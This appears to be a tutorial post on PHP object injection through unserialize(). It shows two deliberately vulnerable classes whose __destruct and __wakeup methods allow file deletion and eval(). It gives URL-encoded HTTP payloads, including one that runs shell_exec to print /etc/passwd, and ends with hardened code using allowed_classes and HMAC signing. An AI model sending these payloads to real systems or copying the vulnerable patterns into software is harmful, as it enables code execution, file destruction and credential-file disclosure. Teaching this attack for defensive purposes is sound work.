Unserialize PHP Exploit Samples



The unserialize PHP exploit is a kind of PHP Object Injection. It occurs when user-controlled input is passed to the unserialize() function without being validated first.

For this exploit to work, the attacker takes advantage of PHP’s magic methods such as __destruct or __wakeup, which PHP calls automatically on the deserialized object.

See the examples below.

For example, suppose you have this class named Sample1 with a __destruct method in it.

<?php
// Vulnerable example: __destruct trusts $this->file, which the attacker
// controls once the object has been created by unserialize().
class Sample1 {
     private $file;
     public function __construct() {
         // SOME PHP CODES HERE
     }

     public function __destruct() {
         // No validation: a '../' sequence in $this->file escapes /tmp (path traversal)
         $file = '/tmp/'.$this->file;
         if(file_exists($file)) {
              return unlink($file);
         }
     }
}

// SOME PHP CODE HERE
// User-controlled input reaches unserialize() unchecked
unserialize($_GET['data']);

As you can see in the example above, the code unserializes $_GET['data'], a user-supplied input, without any validation. An attacker may be able to delete files by combining this with a path traversal attack.

All we need to do here is put a malicious string in the data parameter to make this exploit work. See the malicious payload below.

GET /Sample1.php?data=O%3A8%3A%22Sample1%22%3A1%3A%7Bs%3A14%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload sets Sample1’s private $file property to test.txt and then triggers the __destruct method, which proceeds to delete test.txt in the /tmp directory.

Now look at our second example, which uses the __wakeup magic method.

<?php
// Vulnerable example: __wakeup runs automatically after unserialize() and
// passes the attacker-controlled $cmd property straight to eval().
class Sample2 {
    private $cmd;
    public function __construct() {
        // SOME PHP CODE
    }

    public function __wakeup() {
        if($this->cmd) {
            eval($this->cmd);
        }
    }
}

// SOME PHP CODE
// User-controlled input reaches unserialize() unchecked
unserialize($_GET['data']);

In this example, an attacker may be able to execute arbitrary PHP code by sending a malicious payload. Check the payload below.

GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload simply executes phpinfo();. But with a small tweak to the payload, an attacker can do almost anything on the server. Check the sample payload below, which displays the contents of the /etc/passwd file.

GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

Basically, with this flaw, the attacker can play GOD mode on the victim’s application. That’s how serious this vulnerability is.

This vulnerability is present in PHP 5.3 and higher.
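The following is an added example, not code from the original post, showing how the Sample2 endpoint can be hardened against both payloads above: refusing to instantiate any class during unserialize() (the allowed_classes option, PHP 7.0 and higher) and, where serialized input must be accepted at all, only accepting data the server itself signed with an HMAC. The $key value is a placeholder for a server-side secret kept outside the web root.

```php
<?php
// Added example, not code from the original post: the Sample2 endpoint hardened.
// Assumption: $key is a server-side secret loaded from outside the web root.

class Sample2 {
    private $cmd;
    public function __wakeup() {
        if ($this->cmd) {
            eval($this->cmd);
        }
    }
}

// Mitigation 1 (PHP 7.0+): allowed_classes => false makes unserialize() turn every
// object in the payload into __PHP_Incomplete_Class, so the __wakeup/__destruct
// methods of application classes never run. Use an explicit list of plain data
// classes instead of false only if objects are genuinely required.
function safe_unserialize(string $data) {
    return unserialize($data, ['allowed_classes' => false]);
}

// Mitigation 2: only accept serialized data the application itself produced,
// proven by an HMAC under a server-side secret. Forged or modified input never
// reaches unserialize(); hash_equals() keeps the comparison constant-time.
function sign(string $data, string $key): string {
    return hash_hmac('sha256', $data, $key) . '.' . $data;
}

function verify_and_unserialize(string $signed, string $key) {
    $parts = explode('.', $signed, 2); // hex MAC contains no '.', so limit 2 is safe
    if (count($parts) !== 2) {
        return false;
    }
    list($mac, $data) = $parts;
    if (!hash_equals(hash_hmac('sha256', $data, $key), $mac)) {
        return false;
    }
    return unserialize($data, ['allowed_classes' => false]);
}

// The post's phpinfo() payload, URL-decoded (private property names carry \0 markers).
$payload = 'O:7:"Sample2":1:{s:12:"' . "\0Sample2\0" . 'cmd";s:10:"phpinfo();";}';
$key = 'replace-with-a-real-secret'; // placeholder, not a real secret

// Sample2::__wakeup is not invoked: the object is an incomplete-class stub
var_dump(safe_unserialize($payload) instanceof __PHP_Incomplete_Class);
// Unsigned attacker input is rejected before unserialize() sees it
var_dump(verify_and_unserialize($payload, $key));
// Data the server signed itself round-trips normally
var_dump(verify_and_unserialize(sign(serialize(['id' => 42]), $key), $key));
```

Where the data being exchanged does not need PHP objects at all, json_encode()/json_decode() avoids the problem entirely, because JSON never instantiates application classes.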